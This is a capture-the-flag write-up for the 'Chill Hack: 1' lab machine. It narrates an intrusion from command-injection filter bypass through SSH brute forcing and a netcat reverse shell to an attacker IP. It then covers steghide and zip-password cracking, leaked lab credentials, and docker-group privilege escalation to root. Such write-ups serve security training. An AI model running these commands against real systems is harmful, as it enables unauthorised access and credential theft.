Last updated: 15 Apr 24 09:31:10 (UTC)

Write-Up Chill-Hack

Chill Hack

By Lawcky 01/01/2024

Introduction

Real Life machine vs CTF

Difficulty : Intermediate

Additionnal info :

Name: Chill Hack: 1
Release date: 9 Dec 2020
Author: Anurodh Acharya
Series: Chill Hack

|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them

In this write-up

  • nmap
  • nikto
  • hydra
  • ffuf
  • mysql
  • hashcat
  • zip2john
  • pycrack (first time)
  • steghide (first time)
  • docker

Write-UP

on 192.168.1.94/secret/ it is possible to execute commands, but there is a filtering blocking commands that could be harmful

32861873a07dee1ebe099f86d1650d5e.png

83fbb822010b930a843341742e9eaaba.png

using ‘echo’ we can pass through

echo $(ls)

1a59d913610edc046948003d7e4771fd.png

avec getting all the users with

echo $(cat /etc/passwd)

echo $(ls /home)

hydra -L users -P /usr/share/SecLists/Passwords/common_corporate_passwords.lst ssh://192.168.1.94/

after many tries this reverse shell worked

echo $(rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.253 4242 >/tmp/f)

after upgrading to a full tty we know have a direct access to the server

bedf6239cbf48c0248a05e70123d6559.png

on apaar’s desktop

1e13d07d944012ea4a42832c84ee42aa.png

by running the script using sudo as apaar and entering /bin/sh we managed to get apaar’s shell

31ed66df1bbe9c1ce9b4a4d7a4091da0.png

{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}

first flag found

Enumeration

we run linpeas.sh

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

chmod +x linpeas.sh && ./linpeas.sh

ssh version is vulnerable ==> git clone https://github.com/CptGibbon/CVE-2021-3156.git

didnt work

found in /var/www/ some files that are not on the original site, inside we found credentials for a mysql database

root:!@m+her00+@db

5dc63c9f6db8d6f5ed2c140629e304ef.png

we found hashes in the database

cf44b577a828de88552d3929d761a6bc.png

aurick:masterpassword apaar:dontaskdonttell

i have these two passwords and now i need to find what are they used for

754fc820b1728b41fcc154933d11c656.png

they do not belong to any of the linux users

Hidden Zip files

many texts in the unused files in /var/www talks about ‘looking in the dark for answers’, so i thought maybe the images had something to do, after creating a temporary python http server i transfered the files to inspect it using strings command

python -m http.server 8080 wget ... strings

Got nothing using strings, yet using steghide with no passphrase extracted a zip file

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

We then use pycrack to crack the password of the zip file

python3 pycrack.py

we select dictionary attack and the rockyou wordlist

47bdcb870656dd1b1d7d7a10d458d1dd.png

we get a php page, with inside a password encoded in base64 and a mention of the anurodh user

0a3dd1f123e75a9c1298ff0dbd0765aa.png

69d67ed0e2ec5d2c199a09d2f2a981e5.png

anurodh:!d0ntKn0wmYp@ssw0rd

c19ec977d723809d003c09627044bdca.png

Privilege Escalation

anurodh user belongs to the docker groups, thus we can use it for our privesc

docker run -v /etc/:/mnt -it alpine

this command start a docker as root and mount the /root onto the /mnt making us root user

37ed821c1fe082b9a0b2dc25e353c86b.png

dd8189edbe19bb79c21455068b892221.png

{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}

got second flag

Joplin Server v2.14.2, copyright © 2021-2024 JOPLIN.